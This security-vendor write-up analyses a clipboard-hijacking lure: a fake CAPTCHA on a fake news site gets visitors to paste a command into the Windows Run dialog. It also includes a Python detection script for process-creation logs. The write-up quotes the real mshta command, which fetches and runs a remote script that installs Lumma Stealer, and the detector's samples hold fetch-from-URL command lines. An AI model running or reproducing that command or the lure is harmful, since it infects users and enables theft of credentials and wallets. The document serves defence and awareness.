Clipboard hijacker tries to install a Trojan
Pieter Arntz · 2025-01-01 · via Threat Walkthroughs – ThreatDown by Malwarebytes

Criminals are attempting to get users to install malware from the clipboard.

As patching and software quality improves over time, it gets harder and harder for criminals to run their malware automatically. This leaves them with two alternatives: Break into your computer and run it themselves (a tactic favored by ransomware gangs looking for a large return from a single attack) or find a way to get users to run it.

We recently observed an attack that uses clipboard hijacking for the latter: Fooling users into running malware.

The attack starts when a sensational news headline lures visitors to a website masquerading as a reputable news outlet.

When they arrive at the website, they are shown a fake version of the familiar “I’m not a robot” CAPTCHA.

A fake news site shows a fake CAPTCHA challenge

If they click inside the CAPTCHA look-alike, they are presented with a prompt that asks them to:

  1. Press & hold the Windows Key + R
  2. In the verification window, press Ctrl + V
  3. Press Enter on your keyboard to finish
The fake CAPTCHA’s “verification steps”

Behind the scenes, the website had added the following command to my clipboard:

mshta https://solve.jenj.org/awjxs.captcha?u=25330553-e0c1-4aea-99ed-f76df7024daa # ✅ ''I am not a robot - reCAPTCHA Verification ID: 8370''

You may wonder how this is possible when browsers like Chrome, Firefox, and Safari require explicit user permission before allowing a website to access or modify the clipboard, typically through a prompt the user must accept. In this case, the “permission” was given when the visitor clicked the CAPTCHA image.

The so-called “verification steps” open the Run command prompt (Windows key + R), paste the command from the clipboard into the prompt (Ctrl + V), and then run it (Enter).

The command uses MSHTA (Microsoft HTML Application Host, mshta.exe) to fetch and execute a script from the URL: another reminder that MSHTA should be restricted in your environment.

The command ends with what looks like a comment, designed to fool users into thinking they are still completing the “I am not a robot” check.

Looks legit, right?
The pasted command contains a CAPTCHA-related comment

The command runs a script that attempts to download Lumma Stealer, an information stealer sold as malware-as-a-service (MaaS). Lumma steals information from cryptocurrency wallets and browser extensions, as well as two-factor authentication details.
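As an added example (not ThreatDown's or Malwarebytes' code) of how the chain described above, Run dialog, Ctrl+V, mshta fetching a remote script with a CAPTCHA-looking decoy, can be caught from process-creation telemetry, the script below scores constructed Sysmon-style JSON log lines. The field names, the placeholder URLs, and the script hosts beyond mshta.exe are assumptions, not values from the write-up.

```python
"""Flag 'paste-and-run' clipboard-hijack executions in process-creation logs.

Added example, not ThreatDown's code. It assumes log lines arrive as one JSON
object per line with the Sysmon Event ID 1 field names Image, ParentImage and
CommandLine (a simplified shape), and scores the chain from the write-up:
a script host such as mshta.exe started from explorer.exe (the parent of
anything launched via the Win+R Run dialog), pulling a remote URL, with a
CAPTCHA-style decoy behind a '#'.
"""
import json
import re
from typing import Iterable, List, Optional

# Script hosts commonly abused for the pasted command (mshta.exe is from the
# write-up; the others are an assumption that the same pattern generalizes).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# The decoy: text after '#' that talks about robots, CAPTCHAs or verification.
DECOY_RE = re.compile(r"#.*\b(robot|captcha|verif\w*)\b", re.IGNORECASE)
ALERT_THRESHOLD = 4

# Constructed sample events (placeholders, not the indicators from the article).
_EVENTS = [
    {   # 1: the full chain: Run dialog -> mshta -> remote URL + decoy comment
        "EventID": 1,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://captcha.example.invalid/solve.captcha?u=PLACEHOLDER-GUID "
                       "# ✅ ''I am not a robot - reCAPTCHA Verification ID: 0000''",
    },
    {   # 2: benign: a user opens a local .hta from Explorer
        "EventID": 1,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Tools\inventory.hta"',
    },
    {   # 3: not a script host at all
        "EventID": 1,
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "firefox.exe https://news.example.invalid/story",
    },
    {   # 4: powershell from the Run dialog fetching a URL, no decoy: still worth a look
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -Command "Invoke-WebRequest https://updates.example.invalid/x.ps1"',
    },
]
SAMPLE_LOGS = [json.dumps(e) for e in _EVENTS]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Optional[dict]:
    """Score one parsed event; None if the image is not a script host."""
    image = _basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    score, reasons = 0, []
    if _basename(event.get("ParentImage", "")) == "explorer.exe":
        score += 2
        reasons.append("parent is explorer.exe (Run dialog or shell launch)")
    if URL_RE.search(cmd):
        score += 2
        reasons.append("remote URL on the command line")
    if DECOY_RE.search(cmd):
        score += 3
        reasons.append("CAPTCHA-style decoy text after '#'")
    return {"image": image, "score": score, "reasons": reasons, "command_line": cmd}


def score_line(line: str) -> Optional[dict]:
    """Parse one JSON log line; malformed lines and non-process-creation events give None."""
    try:
        event = json.loads(line)
    except json.JSONDecodeError:
        return None
    if event.get("EventID") != 1:
        return None
    return score_event(event)


def detect(lines: Iterable[str]) -> List[dict]:
    """Return the events whose score reaches ALERT_THRESHOLD, in input order."""
    findings = []
    for line in lines:
        scored = score_line(line)
        if scored and scored["score"] >= ALERT_THRESHOLD:
            findings.append(scored)
    return findings


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOGS):
        print(f"[score {hit['score']}] {hit['image']}: {'; '.join(hit['reasons'])}")
```

Run as-is, it flags events 1 and 4 and ignores the local .hta and the browser launch. The parent-is-explorer signal matters because anything typed into Win+R runs under explorer.exe; combined with a URL on the command line it separates a pasted command from a user opening a local HTA, and the decoy comment is the strongest single indicator of this specific lure.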

The ThreatDown/Malwarebytes web protection module saved the day.

ThreatDown and Malwarebytes software blocks the domain

Generally speaking, if a website asks you to run a command, go elsewhere.